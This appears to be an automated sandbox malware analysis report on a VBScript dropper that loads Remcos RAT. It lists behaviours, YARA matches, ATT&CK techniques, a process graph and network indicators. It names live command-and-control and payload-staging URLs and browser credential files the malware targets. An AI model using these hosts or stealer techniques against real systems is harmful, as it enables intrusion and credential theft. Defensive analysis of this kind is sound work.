                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0044F7F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,11_2_00445914
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,11_2_00445E1C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_0044EEB8
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00404F31 GetLocalTime,CreateEventA,CreateThread,11_2_00404F31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004195F8 GetComputerNameExW,GetUserNameW,11_2_004195F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_004466BF
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 8.2.powershell.exe.20011562480.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.20011562480.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3435406338.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3435406338.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3436141535.0000000002DDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2331620773.000002001111A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6308, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data11_2_0040A953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_0040AA71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db11_2_0040AA71

                Remote Access Functionality

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-YJH0WYJump to behavior
                Source: Yara matchFile source: 8.2.powershell.exe.20011562480.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.20011562480.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3435406338.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3435406338.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3436141535.0000000002DDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2331620773.000002001111A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6308, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe11_2_0040567A
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting
                Valid Accounts1
                Native API
                221
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Exploitation for Client Execution
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                3
                Obfuscated Files or Information
                211
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol211
                Input Capture
                12
                Ingress Tool Transfer
                Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts12
                Command and Scripting Interpreter
                1
                Windows Service
                1
                Windows Service
                1
                Software Packing
                2
                Credentials In Files
                1
                System Service Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                21
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution
                Login Hook222
                Process Injection
                1
                DLL Side-Loading
                NTDS4
                File and Directory Discovery
                Distributed Component Object ModelInput Capture1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts3
                PowerShell
                Network Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets33
                System Information Discovery
                SSHKeylogging1
                Remote Access Software
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials21
                Security Software Discovery
                VNCGUI Input Capture2
                Non-Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync21
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal Capture23
                Application Layer Protocol
                Exfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                Process Injection
                Proc Filesystem3
                Process Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                Application Window Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery
                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                System Network Configuration Discovery
                Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528047 Sample: PAYMENT SPECIFIKACIJA 36484... Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 46 paste.ee 2->46 48 ab9001.ddns.net 2->48 50 raw.githubusercontent.com 2->50 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 72 11 other signatures 2->72 9 wscript.exe 1 2->9         started        signatures3 68 Connects to a pastebin service (likely for C&C) 46->68 70 Uses dynamic DNS services 48->70 process4 signatures5 74 VBScript performs obfuscated calls to suspicious functions 9->74 76 Suspicious powershell command line found 9->76 78 Wscript starts Powershell (via cmd or directly) 9->78 80 3 other signatures 9->80 12 powershell.exe 7 9->12         started        15 cmd.exe 1 9->15         started        process6 signatures7 82 Suspicious powershell command line found 12->82 84 Obfuscated command line found 12->84 17 powershell.exe 14 15 12->17         started        21 conhost.exe 12->21         started        86 Wscript starts Powershell (via cmd or directly) 15->86 88 Uses ping.exe to sleep 15->88 90 Uses ping.exe to check the status of other devices and networks 15->90 23 powershell.exe 7 15->23         started        25 PING.EXE 1 15->25         started        27 conhost.exe 15->27         started        process8 dnsIp9 40 paste.ee 188.114.97.3, 443, 49761 CLOUDFLARENETUS European Union 17->40 42 raw.githubusercontent.com 185.199.108.133, 443, 49740 FASTLYUS Netherlands 17->42 52 Writes to foreign memory regions 17->52 54 Injects a PE file into a foreign processes 17->54 29 AddInProcess32.exe 17->29         started        32 AddInProcess32.exe 2 2 17->32         started        56 Suspicious powershell command line found 23->56 58 Obfuscated command line found 23->58 60 Found suspicious powershell code related to unpacking or dynamic code loading 23->60 44 127.0.0.1 unknown unknown 25->44 signatures10 process11 dnsIp12 92 Contains functionalty to change the wallpaper 29->92 94 Contains functionality to steal Chrome passwords or cookies 29->94 96 Contains functionality to register a low level keyboard hook 29->96 102 2 other signatures 29->102 38 ab9001.ddns.net 64.188.16.157, 35890, 49772, 49920 ASN-QUADRANET-GLOBALUS United States 32->38 36 C:\Users\user\remcos\logs.dat, data 32->36 dropped 98 Detected Remcos RAT 32->98 100 Installs a global keyboard hook 32->100 file13 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                PAYMENT SPECIFIKACIJA 364846637-pdf.vbs3%ReversingLabsWin32.Trojan.Generic
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://aka.ms/pscore60%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://geoplugin.net/json.gp/C0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://oneget.orgX0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://oneget.org0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                paste.ee
                188.114.97.3
                truetrue
                  unknown
                  raw.githubusercontent.com
                  185.199.108.133
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalse
                      unknown
                      ab9001.ddns.net
                      64.188.16.157
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                          unknown
                          https://paste.ee/d/fb4UJ/0true
                            unknown
                            ab9001.ddns.nettrue
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2305231614.00000200019B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2305231614.0000020001958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://paste.eepowershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2305231614.0000020001958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://go.micropowershell.exe, 00000008.00000002.2305231614.0000020000F3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/Licensepowershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.google.com;powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://raw.githubusercontpowershell.exe, 00000008.00000002.2305231614.00000200016E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://analytics.paste.eepowershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://paste.eepowershell.exe, 00000008.00000002.2305231614.000002000042B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://aka.ms/pscore6powershell.exe, 00000005.00000002.2241105087.000001F12F71A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2305231614.0000020001958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              http://geoplugin.net/json.gpAddInProcess32.exefalse
                                              • URL Reputation: safe
                                              unknown
                                              https://www.google.compowershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://raw.githubusercontent.compowershell.exe, 00000008.00000002.2305231614.0000020000223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.0000020001660000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2331620773.000002001111A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2305231614.00000200019B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://raw.githubusercontent.compowershell.exe, 00000008.00000002.2305231614.00000200016E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://oneget.orgXpowershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://analytics.paste.ee;powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://cdnjs.cloudflare.compowershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://aka.ms/pscore68powershell.exe, 00000005.00000002.2241105087.000001F12F74A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383250210.000001FC48BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383250210.000001FC48C0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.0000020000001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cdnjs.cloudflare.com;powershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2241105087.000001F12F76C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383250210.000001FC48BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2305231614.0000020000001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://secure.gravatar.compowershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://themes.googleusercontent.compowershell.exe, 00000008.00000002.2305231614.0000020000517000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://oneget.orgpowershell.exe, 00000008.00000002.2305231614.000002000172E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt3dK;powershell.exe, 00000008.00000002.2305231614.0000020000223000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                64.188.16.157
                                                                ab9001.ddns.netUnited States
                                                                8100ASN-QUADRANET-GLOBALUStrue
                                                                188.114.97.3
                                                                paste.eeEuropean Union
                                                                13335CLOUDFLARENETUStrue
                                                                185.199.108.133
                                                                raw.githubusercontent.comNetherlands
                                                                54113FASTLYUSfalse
                                                                IP
                                                                127.0.0.1
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1528047
                                                                Start date and time:2024-10-07 14:51:10 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 25s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:13
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:PAYMENT SPECIFIKACIJA 364846637-pdf.vbs
                                                                Detection:MAL
                                                                Classification:mal100.rans.troj.spyw.expl.evad.winVBS@17/8@5/4
                                                                EGA Information:
                                                                • Successful, ratio: 50%
                                                                HCA Information:
                                                                • Successful, ratio: 99%
                                                                • Number of executed functions: 50
                                                                • Number of non-executed functions: 173
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .vbs
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded IPs from analysis (whitelisted): 40.126.32.138, 40.126.32.136, 40.126.32.68, 20.190.160.20, 20.190.160.22, 40.126.32.140, 40.126.32.134, 40.126.32.74
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                • Execution Graph export aborted for target powershell.exe, PID 3180 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 6200 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: PAYMENT SPECIFIKACIJA 364846637-pdf.vbs
                                                                TimeTypeDescription
                                                                08:52:22API Interceptor41x Sleep call for process: powershell.exe modified
                                                                08:52:59API Interceptor1775804x Sleep call for process: AddInProcess32.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                64.188.16.157SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                  1728033125dd387fed0490e7ade394383eca6a3c5cb1fd0e94f8067e03fabd8e0d741cea5c331.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                    PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                                        1722601625e1f9a4f530f6395665807ae8da7c9d13076e57dbdc05cedb2ad13cd85af8a931941.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          PO#2195112.vbsGet hashmaliciousRemcosBrowse
                                                                            BL-RTM1439068.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                              188.114.97.3Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                              • www.cc101.pro/0r21/
                                                                              http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                                                              • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • filetransfer.io/data-package/eZFzMENr/download
                                                                              QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • filetransfer.io/data-package/MlZtCPkK/download
                                                                              https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                                              • mairie-espondeilhan.com/
                                                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • filetransfer.io/data-package/758bYd86/download
                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • filetransfer.io/data-package/58PSl7si/download
                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • filetransfer.io/data-package/58PSl7si/download
                                                                              payment copy.exeGet hashmaliciousFormBookBrowse
                                                                              • www.cc101.pro/0r21/
                                                                              BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                              • cloud.dellicon.top/1000/500/
                                                                              185.199.108.133SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                k4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                                                                  Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                                    PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                      Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                                                        http://barik-ankita.github.io/Netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                                          http://mr-zkpak47.github.io/Netflix_Front_PageGet hashmaliciousHTMLPhisherBrowse
                                                                                            na.rtfGet hashmaliciousRemcosBrowse
                                                                                              http://kartike1103.github.io/NetflixGet hashmaliciousHTMLPhisherBrowse
